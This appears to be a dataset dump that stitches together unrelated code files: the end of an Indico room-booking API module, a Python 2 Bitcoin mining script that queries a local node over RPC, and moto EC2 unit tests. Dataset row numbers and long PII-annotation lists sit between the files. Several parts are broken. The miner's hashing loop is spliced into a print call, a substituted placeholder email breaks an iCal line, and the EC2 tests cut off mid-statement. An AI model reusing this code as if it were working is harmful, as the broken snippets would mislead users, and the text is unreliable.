rb_check_user_access(aw.getUser()): + return False + if self._room.can_be_booked(aw.getUser()): + return True + elif self._room.can_be_prebooked(aw.getUser()): + raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.') + return False + + def api_roomBooking(self, aw): + data = MultiDict({ + 'start_dt': self._params['from'], + 'end_dt': self._params['to'], + 'repeat_frequency': RepeatFrequency.NEVER, + 'repeat_interval': 0, + 'room_id': self._room.id, + 'booked_for_id': self._params['booked_for'].getId(), + 'contact_email': self._params['booked_for'].getEmail(), + 'contact_phone': self._params['booked_for'].getTelephone(), + 'booking_reason': self._params['reason'] + }) + try: + reservation = Reservation.create_from_data(self._room, data, aw.getUser()) + except ConflictingOccurrences: + raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings') + except IndicoError as e: + raise HTTPAPIError('Failed to create the booking: {}'.format(e)) + db.session.add(reservation) + db.session.flush() + return {'reservationID': reservation.id} + + +def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None): + """"""Exports reservations. + + :param hook: The HTTPAPIHook instance + :param limit_per_room: Should the limit/offset be applied per room + :param include_rooms: Should reservations include room information + """""" + filters = list(extra_filters) if extra_filters else [] + if hook._fromDT and hook._toDT: + filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date()) + filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date()) + filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time()) + filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time()) + elif hook._toDT: + filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date()) + filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time()) + elif hook._fromDT: + filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date()) + filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time()) + filters += _get_reservation_state_filter(hook._queryParams) + occurs = [datetime.strptime(x, '%Y-%m-%d').date() + for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))] + data = ['vc_equipment'] + if hook._occurrences: + data.append('occurrences') + order = { + 'start': Reservation.start_dt, + 'end': Reservation.end_dt + }.get(hook._orderBy, Reservation.start_dt) + if hook._descending: + order = order.desc() + reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset, + order=order, limit_per_room=limit_per_room, occurs_on=occurs) + for result in reservations_data: + yield result['reservation'].room_id, _serializable_reservation(result, include_rooms) + + +def _serializable_room(room_data, reservations=None): + """"""Serializable room data + + :param room_data: Room data + :param reservations: MultiDict mapping for room id => reservations + """""" + data = room_data['room'].to_serializable('__api_public__') + data['_type'] = 'Room' + data['avc'] = bool(room_data['vc_equipment']) + data['vcList'] = room_data['vc_equipment'] + data['equipment'] = room_data['non_vc_equipment'] + if reservations is not None: + data['reservations'] = reservations.getlist(room_data['room'].id) + return data + + +def _serializable_room_minimal(room): + """"""Serializable minimal room data (inside reservations) + + :param room: A `Room` + """""" + data = room.to_serializable('__api_minimal_public__') + data['_type'] = 'Room' + return data + + +def _serializable_reservation(reservation_data, include_room=False): + """"""Serializable reservation (standalone or inside room) + + :param reservation_data: Reservation data + :param include_room: Include minimal room information + """""" + reservation = reservation_data['reservation'] + data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz}) + data['_type'] = 'Reservation' + data['repeatability'] = None + if reservation.repeat_frequency: + data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition) + data['vcList'] = reservation_data['vc_equipment'] + if include_room: + data['room'] = _serializable_room_minimal(reservation_data['reservation'].room) + if 'occurrences' in reservation_data: + data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz}) + for o in reservation_data['occurrences']] + return data + + +def _ical_serialize_repeatability(data): + start_dt_utc = data['startDT'].astimezone(pytz.utc) + end_dt_utc = data['endDT'].astimezone(pytz.utc) + WEEK_DAYS = 'MO TU WE TH FR SA SU'.split() + recur = ical.vRecur() + recur['until'] = end_dt_utc + if data['repeat_frequency'] == RepeatFrequency.DAY: + recur['freq'] = 'daily' + elif data['repeat_frequency'] == RepeatFrequency.WEEK: + recur['freq'] = 'weekly' + recur['interval'] = data['repeat_interval'] + elif data['repeat_frequency'] == RepeatFrequency.MONTH: + recur['freq'] = 'monthly' + recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()]) + return recur + + +def _ical_serialize_reservation(cal, data, now): + start_dt_utc = data['startDT'].astimezone(pytz.utc) + end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc) + + event = icalendar.Event() + event.add('uid', dummy@email.com' % data['id']) + event.add('dtstamp', now) + event.add('dtstart', start_dt_utc) + event.add('dtend', end_dt_utc) + event.add('url', data['bookingUrl']) + event.add('summary', data['reason']) + event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName'])) + event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl']) + if data['repeat_frequency'] != RepeatFrequency.NEVER: + event.add('rrule', _ical_serialize_repeatability(data)) + cal.add_component(event) + + +def _add_server_tz(dt): + if dt.tzinfo is None: + return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone())) + return dt + + +def _yesno(value): + return value.lower() in {'yes', 'y', '1', 'true'} + + +def _get_reservation_state_filter(params): + cancelled = get_query_parameter(params, ['cxl', 'cancelled']) + rejected = get_query_parameter(params, ['rej', 'rejected']) + confirmed = get_query_parameter(params, ['confirmed']) + archived = get_query_parameter(params, ['arch', 'archived', 'archival']) + repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating']) + avc = get_query_parameter(params, ['avc']) + avc_support = get_query_parameter(params, ['avcs', 'avcsupport']) + startup_support = get_query_parameter(params, ['sts', 'startupsupport']) + booked_for = get_query_parameter(params, ['bf', 'bookedfor']) + + filters = [] + if cancelled is not None: + filters.append(Reservation.is_cancelled == _yesno(cancelled)) + if rejected is not None: + filters.append(Reservation.is_rejected == _yesno(rejected)) + if confirmed is not None: + if confirmed == 'pending': + filters.append(Reservation.is_pending) + elif _yesno(confirmed): + filters.append(Reservation.is_accepted) + else: + filters.append(~Reservation.is_accepted) + filters.append(Reservation.is_rejected | Reservation.is_cancelled) + if archived is not None: + filters.append(Reservation.is_archived == _yesno(archived)) + if repeating is not None: + if _yesno(repeating): + filters.append(Reservation.repeat_frequency != 0) + else: + filters.append(Reservation.repeat_frequency == 0) + if avc is not None: + filters.append(Reservation.uses_vc == _yesno(avc)) + if avc_support is not None: + filters.append(Reservation.needs_vc_assistance == _yesno(avc_support)) + if startup_support is not None: + filters.append(Reservation.needs_assistance == _yesno(startup_support)) + if booked_for: + like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%')) + filters.append(Reservation.booked_for_name.ilike(like_str)) + return filters +",16517,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'Indico'], ['DATE_TIME', '2002 - 2013'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'indico.modules.rb.models.rooms'], ['LOCATION', 'super(RoomBookingHookBase'], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'self)._getParams'], ['PERSON', 'self)._getParams'], ['DATE_TIME', ""the same day'""], ['PERSON', ""HTTPAPIError('You""], ['PERSON', 'NEVER'], ['PERSON', ""self._params['reason""], ['PERSON', 'db.session.flush'], ['PERSON', 'include_rooms'], ['PERSON', '.split'], ['PERSON', 'reservations_data = Reservation.get_with_data(*data'], ['PERSON', 'include_rooms'], ['NRP', 'MultiDict'], ['LOCATION', 'serializable_reservation(reservation_data'], ['DATE_TIME', 'daily'], ['DATE_TIME', 'weekly'], ['DATE_TIME', 'monthly'], ['DATE_TIME', 'WEEK_DAYS[start_dt_utc.weekday'], ['PERSON', ""data['id""], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'RepeatFrequency.NE'], ['PERSON', 'bookedfor'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'indico.core.co'], ['URL', 'indico.co'], ['URL', 'indico.core.er'], ['URL', 'indico.mo'], ['URL', 'indico.modules.rb.models.re'], ['URL', 'indico.modules.rb.mo'], ['URL', 'indico.modules.rb.models.ro'], ['URL', 'indico.web.ht'], ['URL', 'indico.web.ht'], ['URL', 'api.me'], ['URL', 'indico.web.ht'], ['URL', 'api.re'], ['URL', 'indico.web.ht'], ['URL', 'MaKaC.au'], ['URL', 'MaKaC.common.in'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'Room.id.in'], ['URL', 'loc.id'], ['URL', 'Reservation.ro'], ['URL', 'id.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Config.ge'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'loc.id'], ['URL', 'Room.name.il'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Location.name.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'datetime.no'], ['URL', 'params.it'], ['URL', 'Room.ge'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'RepeatFrequency.NE'], ['URL', 'room.id'], ['URL', 'Reservation.cr'], ['URL', 'aw.ge'], ['URL', 'db.session.ad'], ['URL', 'db.se'], ['URL', 'reservation.id'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'datetime.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'order.de'], ['URL', 'Reservation.ge'], ['URL', 'reservations.ge'], ['URL', 'room.to'], ['URL', 'reservation.to'], ['URL', 'reservation.re'], ['URL', 'RepeatMapping.ge'], ['URL', 'reservation.re'], ['URL', 'o.to'], ['URL', 'RepeatFrequency.MO'], ['URL', 'datetime.com'], ['URL', 'event.ad'], ['URL', 'email.com'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'cal.ad'], ['URL', 'dt.tz'], ['URL', 'dt.re'], ['URL', 'HelperMaKaCInfo.ge'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.re'], ['URL', 'Reservation.re'], ['URL', 'Reservation.us'], ['URL', 'Reservation.ne'], ['URL', 'Reservation.ne'], ['URL', 'for.re'], ['URL', 'Reservation.bo'], ['URL', 'name.il']]" +67,"#!/usr/bin/python +# +# Copyright (c) 2011 The Bitcoin developers +# Distributed under the MIT/X11 software license, see the accompanying +# file COPYING or http://www.opensource.org/licenses/mit-license.php. +# + +import time +import json +import pprint +import hashlib +import struct +import re +import base64 +import httplib +import sys +from multiprocessing import Process + +ERR_SLEEP = 15 +MAX_NONCE = 1000000L + +settings = {} +pp = pprint.PrettyPrinter(indent=4) + +class BitcoinRPC: + OBJID = 1 + + def __init__(self, host, port, username, password): + authpair = ""%s:%s"" % (username, password) + self.authhdr = ""Basic %s"" % (base64.b64encode(authpair)) + self.conn = httplib.HTTPConnection(host, port, False, 30) + def rpc(self, method, params=None): + self.OBJID += 1 + obj = { 'version' : '1.1', + 'method' : method, + 'id' : self.OBJID } + if params is None: + obj['params'] = [] + else: + obj['params'] = params + self.conn.request('POST', '/', json.dumps(obj), + { 'Authorization' : self.authhdr, + 'Content-type' : 'application/json' }) + + resp = self.conn.getresponse() + if resp is None: + print ""JSON-RPC: no response"" + return None + + body = resp.read() + resp_obj = json.loads(body) + if resp_obj is None: + print ""JSON-RPC: cannot JSON-decode body"" + return None + if 'error' in resp_obj and resp_obj['error'] != None: + return resp_obj['error'] + if 'result' not in resp_obj: + print ""JSON-RPC: no result in object"" + return None + + return resp_obj['result'] + def getblockcount(self): + return self.rpc('getblockcount') + def getwork(self, data=None): + return self.rpc('getwork', data) + +def uint32(x): + return x & 0xffffffffL + +def bytereverse(x): + return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | + (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) + +def bufreverse(in_buf): + out_words = [] + for i in range(0, len(in_buf), 4): + word = struct.unpack('@I', in_buf[i:i+4])[0] + out_words.append(struct.pack('@I', bytereverse(word))) + return ''.join(out_words) + +def wordreverse(in_buf): + out_words = [] + for i in range(0, len(in_buf), 4): + out_words.append(in_buf[i:i+4]) + out_words.reverse() + return ''.join(out_words) + +class Miner: + def __init__(self, id): + self.id = id + self.max_nonce = MAX_NONCE + + def work(self, datastr, targetstr): + # decode work data hex string to binary + static_data = datastr.decode('hex') + static_data = bufreverse(static_data) + + # the first 76b of 80b do not change + blk_hdr = static_data[:76] + + # decode 256-bit target value + targetbin = targetstr.decode('hex') + targetbin = targetbin[::-1] # byte-swap and dword-swap + targetbin_str = targetbin.encode('hex') + target = long(targetbin_str, 16) + + # pre-hash first 76b of block header + static_hash = hashlib.sha256() + static_hash.update(blk_hdr) + + for nonce in xrange(self.max_nonce): + + # encode 32-bit nonce value + nonce_bin = struct.pack("" Upstream RPC result:"", result + + def iterate(self, rpc): + work = rpc.getwork() + if work is None: + time.sleep(ERR_SLEEP) + return + if 'data' not in work or 'target' not in work: + time.sleep(ERR_SLEEP) + return + + time_start = time.time() + + (hashes_done, nonce_bin) = self.work(work['data'], + work['target']) + + time_end = time.time() + time_diff = time_end - time_start + + self.max_nonce = long( + (hashes_done * settings['scantime']) / time_diff) + if self.max_nonce > 0xfffffffaL: + self.max_nonce = 0xfffffffaL + + if settings['hashmeter']: + print ""HashMeter(%d): %d hashes, %.2f Khash/sec"" % ( + self.id, hashes_done, + (hashes_done / 1000.0) / time_diff) + + if nonce_bin is not None: + self.submit_work(rpc, work['data'], nonce_bin) + + def loop(self): + rpc = BitcoinRPC(settings['host'], settings['port'], + settings['rpcuser'], settings['rpcpass']) + if rpc is None: + return + + while True: + self.iterate(rpc) + +def miner_thread(id): + miner = Miner(id) + miner.loop() + +if __name__ == '__main__': + if len(sys.argv) != 2: + print ""Usage: pyminer.py CONFIG-FILE"" + sys.exit(1) + + f = open(sys.argv[1]) + for line in f: + # skip comment lines + m = re.search('^\s*#', line) + if m: + continue + + # parse key=value lines + m = re.search('^(\w+)\s*=\s*(\S.*)$', line) + if m is None: + continue + settings[m.group(1)] = m.group(2) + f.close() + + if 'host' not in settings: + settings['host'] = '127.0.0.1' + if 'port' not in settings: + settings['port'] = 9131 + if 'threads' not in settings: + settings['threads'] = 1 + if 'hashmeter' not in settings: + settings['hashmeter'] = 0 + if 'scantime' not in settings: + settings['scantime'] = 30L + if 'rpcuser' not in settings or 'rpcpass' not in settings: + print ""Missing username and/or password in cfg file"" + sys.exit(1) + + settings['port'] = int(settings['port']) + settings['threads'] = int(settings['threads']) + settings['hashmeter'] = int(settings['hashmeter']) + settings['scantime'] = long(settings['scantime']) + + thr_list = [] + for thr_id in range(settings['threads']): + p = Process(target=miner_thread, args=(thr_id,)) + p.start() + thr_list.append(p) + time.sleep(1) # stagger threads + + print settings['threads'], ""mining threads started"" + + print time.asctime(), ""Miner Starts - %s:%s"" % (settings['host'], settings['port']) + try: + for thr_proc in thr_list: + thr_proc.join() + except KeyboardInterrupt: + pass + print time.asctime(), ""Miner Stops - %s:%s"" % (settings['host'], settings['port']) + +",6434,"[['DATE_TIME', '2011'], ['PERSON', ""out_words.append(struct.pack('@I""], ['PERSON', 'Miner'], ['LOCATION', 'targetstr'], ['DATE_TIME', 'the first 76b of 80b'], ['DATE_TIME', '16'], ['PERSON', 'hash1 = hash1_o.digest'], ['LOCATION', 'hash_o.update(hash1'], ['PERSON', 'param_arr ='], ['PERSON', 'hashes_done'], ['DATE_TIME', 'time_end - time_start'], ['PERSON', 'hashes_done'], ['PERSON', 'hashes_done'], ['PERSON', 'scantime'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '::'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pprint.Pr'], ['URL', 'self.au'], ['URL', 'self.co'], ['URL', 'httplib.HT'], ['URL', 'self.conn.re'], ['URL', 'self.au'], ['URL', 'self.conn.ge'], ['URL', 'resp.re'], ['URL', 'struct.pa'], ['URL', 'words.re'], ['URL', 'self.id'], ['URL', 'self.ma'], ['URL', 'datastr.de'], ['URL', 'targetstr.de'], ['URL', 'hashlib.sh'], ['URL', 'self.ma'], ['URL', 'struct.pa'], ['URL', 'hash.co'], ['URL', 'hashlib.sh'], ['URL', 'time.as'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.id'], ['URL', 'self.su'], ['URL', 'self.it'], ['URL', 'sys.ar'], ['URL', 'pyminer.py'], ['URL', 'sys.ar'], ['URL', 're.se'], ['URL', 're.se'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'f.cl'], ['URL', 'p.st'], ['URL', 'time.sl'], ['URL', 'time.as'], ['URL', 'proc.jo'], ['URL', 'time.as']]" +68,"from __future__ import unicode_literals + +from botocore.exceptions import ClientError + +import pytest +from unittest import SkipTest + +import base64 +import ipaddress + +import six +import boto +import boto3 +from boto.ec2.instance import Reservation, InstanceAttribute +from boto.exception import EC2ResponseError +from freezegun import freeze_time +import sure # noqa + +from moto import mock_ec2_deprecated, mock_ec2, settings +from tests import EXAMPLE_AMI_ID +from tests.helpers import requires_boto_gte + + +if six.PY2: + decode_method = base64.decodestring +else: + decode_method = base64.decodebytes + +################ Test Readme ############### +def add_servers(ami_id, count): + conn = boto.connect_ec2() + for index in range(count): + conn.run_instances(ami_id) + + +@mock_ec2_deprecated +def test_add_servers(): + add_servers(EXAMPLE_AMI_ID, 2) + + conn = boto.connect_ec2() + reservations = conn.get_all_reservations() + assert len(reservations) == 2 + instance1 = reservations[0].instances[0] + assert instance1.image_id == EXAMPLE_AMI_ID + + +############################################ + + +@freeze_time(""2014-01-01 05:00:00"") +@mock_ec2_deprecated +def test_instance_launch_and_terminate(): + conn = boto.ec2.connect_to_region(""us-east-1"") + + with pytest.raises(EC2ResponseError) as ex: + reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + reservation = conn.run_instances(EXAMPLE_AMI_ID) + reservation.should.be.a(Reservation) + reservation.instances.should.have.length_of(1) + instance = reservation.instances[0] + instance.state.should.equal(""pending"") + + reservations = conn.get_all_reservations() + reservations.should.have.length_of(1) + reservations[0].id.should.equal(reservation.id) + instances = reservations[0].instances + instances.should.have.length_of(1) + instance = instances[0] + instance.id.should.equal(instance.id) + instance.state.should.equal(""running"") + instance.launch_time.should.equal(""2014-01-01T05:00:00.000Z"") + instance.vpc_id.shouldnt.equal(None) + instance.placement.should.equal(""us-east-1a"") + + root_device_name = instance.root_device_name + instance.block_device_mapping[root_device_name].status.should.equal(""in-use"") + volume_id = instance.block_device_mapping[root_device_name].volume_id + volume_id.should.match(r""vol-\w+"") + + volume = conn.get_all_volumes(volume_ids=[volume_id])[0] + volume.attach_data.instance_id.should.equal(instance.id) + volume.status.should.equal(""in-use"") + + with pytest.raises(EC2ResponseError) as ex: + conn.terminate_instances([instance.id], dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.terminate_instances([instance.id]) + + reservations = conn.get_all_reservations() + instance = reservations[0].instances[0] + instance.state.should.equal(""terminated"") + + +@mock_ec2 +def test_instance_terminate_discard_volumes(): + + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[ + { + ""DeviceName"": ""/dev/sda1"", + ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": True}, + } + ], + ) + instance = result[0] + + instance_volume_ids = [] + for volume in instance.volumes.all(): + instance_volume_ids.append(volume.volume_id) + + instance.terminate() + instance.wait_until_terminated() + + assert not list(ec2_resource.volumes.all()) + + +@mock_ec2 +def test_instance_terminate_keep_volumes_explicit(): + + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[ + { + ""DeviceName"": ""/dev/sda1"", + ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": False}, + } + ], + ) + instance = result[0] + + instance_volume_ids = [] + for volume in instance.volumes.all(): + instance_volume_ids.append(volume.volume_id) + + instance.terminate() + instance.wait_until_terminated() + + assert len(list(ec2_resource.volumes.all())) == 1 + + +@mock_ec2 +def test_instance_terminate_keep_volumes_implicit(): + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}], + ) + instance = result[0] + + instance_volume_ids = [] + for volume in instance.volumes.all(): + instance_volume_ids.append(volume.volume_id) + + instance.terminate() + instance.wait_until_terminated() + + assert len(instance_volume_ids) == 1 + volume = ec2_resource.Volume(instance_volume_ids[0]) + volume.state.should.equal(""available"") + + +@mock_ec2 +def test_instance_terminate_detach_volumes(): + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[ + {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}, + {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}, + ], + ) + instance = result[0] + for volume in instance.volumes.all(): + response = instance.detach_volume(VolumeId=volume.volume_id) + response[""State""].should.equal(""detaching"") + + instance.terminate() + instance.wait_until_terminated() + + assert len(list(ec2_resource.volumes.all())) == 2 + + +@mock_ec2 +def test_instance_detach_volume_wrong_path(): + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},], + ) + instance = result[0] + for volume in instance.volumes.all(): + with pytest.raises(ClientError) as ex: + instance.detach_volume(VolumeId=volume.volume_id, Device=""/dev/sdf"") + + ex.value.response[""Error""][""Code""].should.equal(""InvalidAttachment.NotFound"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + ex.value.response[""Error""][""Message""].should.equal( + ""The volume {0} is not attached to instance {1} as device {2}"".format( + volume.volume_id, instance.instance_id, ""/dev/sdf"" + ) + ) + + +@mock_ec2_deprecated +def test_terminate_empty_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError) + + +@freeze_time(""2014-01-01 05:00:00"") +@mock_ec2_deprecated +def test_instance_attach_volume(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + vol1 = conn.create_volume(size=36, zone=conn.region.name) + vol1.attach(instance.id, ""/dev/sda1"") + vol1.update() + vol2 = conn.create_volume(size=65, zone=conn.region.name) + vol2.attach(instance.id, ""/dev/sdb1"") + vol2.update() + vol3 = conn.create_volume(size=130, zone=conn.region.name) + vol3.attach(instance.id, ""/dev/sdc1"") + vol3.update() + + reservations = conn.get_all_reservations() + instance = reservations[0].instances[0] + + instance.block_device_mapping.should.have.length_of(3) + + for v in conn.get_all_volumes( + volume_ids=[instance.block_device_mapping[""/dev/sdc1""].volume_id] + ): + v.attach_data.instance_id.should.equal(instance.id) + # can do due to freeze_time decorator. + v.attach_data.attach_time.should.equal(instance.launch_time) + # can do due to freeze_time decorator. + v.create_time.should.equal(instance.launch_time) + v.region.name.should.equal(instance.region.name) + v.status.should.equal(""in-use"") + + +@mock_ec2_deprecated +def test_get_instances_by_id(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2) + instance1, instance2 = reservation.instances + + reservations = conn.get_all_reservations(instance_ids=[instance1.id]) + reservations.should.have.length_of(1) + reservation = reservations[0] + reservation.instances.should.have.length_of(1) + reservation.instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id]) + reservations.should.have.length_of(1) + reservation = reservations[0] + reservation.instances.should.have.length_of(2) + instance_ids = [instance.id for instance in reservation.instances] + instance_ids.should.equal([instance1.id, instance2.id]) + + # Call get_all_reservations with a bad id should raise an error + with pytest.raises(EC2ResponseError) as cm: + conn.get_all_reservations(instance_ids=[instance1.id, ""i-1234abcd""]) + cm.value.code.should.equal(""InvalidInstanceID.NotFound"") + cm.value.status.should.equal(400) + cm.value.request_id.should_not.be.none + + +@mock_ec2 +def test_get_paginated_instances(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + for i in range(100): + conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + resp = client.describe_instances(MaxResults=50) + reservations = resp[""Reservations""] + reservations.should.have.length_of(50) + next_token = resp[""NextToken""] + next_token.should_not.be.none + resp2 = client.describe_instances(NextToken=next_token) + reservations.extend(resp2[""Reservations""]) + reservations.should.have.length_of(100) + assert ""NextToken"" not in resp2.keys() + + +@mock_ec2 +def test_create_with_tags(): + ec2 = boto3.client(""ec2"", region_name=""us-west-2"") + instances = ec2.run_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + InstanceType=""t2.micro"", + TagSpecifications=[ + { + ""ResourceType"": ""instance"", + ""Tags"": [ + {""Key"": ""MY_TAG1"", ""Value"": ""MY_VALUE1""}, + {""Key"": ""MY_TAG2"", ""Value"": ""MY_VALUE2""}, + ], + }, + { + ""ResourceType"": ""instance"", + ""Tags"": [{""Key"": ""MY_TAG3"", ""Value"": ""MY_VALUE3""}], + }, + ], + ) + assert ""Tags"" in instances[""Instances""][0] + len(instances[""Instances""][0][""Tags""]).should.equal(3) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_state(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + + conn.terminate_instances([instance1.id]) + + reservations = conn.get_all_reservations(filters={""instance-state-name"": ""running""}) + reservations.should.have.length_of(1) + # Since we terminated instance1, only instance2 and instance3 should be + # returned + instance_ids = [instance.id for instance in reservations[0].instances] + set(instance_ids).should.equal(set([instance2.id, instance3.id])) + + reservations = conn.get_all_reservations( + [instance2.id], filters={""instance-state-name"": ""running""} + ) + reservations.should.have.length_of(1) + instance_ids = [instance.id for instance in reservations[0].instances] + instance_ids.should.equal([instance2.id]) + + reservations = conn.get_all_reservations( + [instance2.id], filters={""instance-state-name"": ""terminated""} + ) + list(reservations).should.equal([]) + + # get_all_reservations should still return all 3 + reservations = conn.get_all_reservations() + reservations[0].instances.should.have.length_of(3) + + conn.get_all_reservations.when.called_with( + filters={""not-implemented-filter"": ""foobar""} + ).should.throw(NotImplementedError) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_instance_id(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + + reservations = conn.get_all_reservations(filters={""instance-id"": instance1.id}) + # get_all_reservations should return just instance1 + reservations[0].instances.should.have.length_of(1) + reservations[0].instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations( + filters={""instance-id"": [instance1.id, instance2.id]} + ) + # get_all_reservations should return two + reservations[0].instances.should.have.length_of(2) + + reservations = conn.get_all_reservations(filters={""instance-id"": ""non-existing-id""}) + reservations.should.have.length_of(0) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_instance_type(): + conn = boto.connect_ec2() + reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"") + instance1 = reservation1.instances[0] + reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"") + instance2 = reservation2.instances[0] + reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"") + instance3 = reservation3.instances[0] + + reservations = conn.get_all_reservations(filters={""instance-type"": ""m1.small""}) + # get_all_reservations should return instance1,2 + reservations.should.have.length_of(2) + reservations[0].instances.should.have.length_of(1) + reservations[1].instances.should.have.length_of(1) + instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id] + 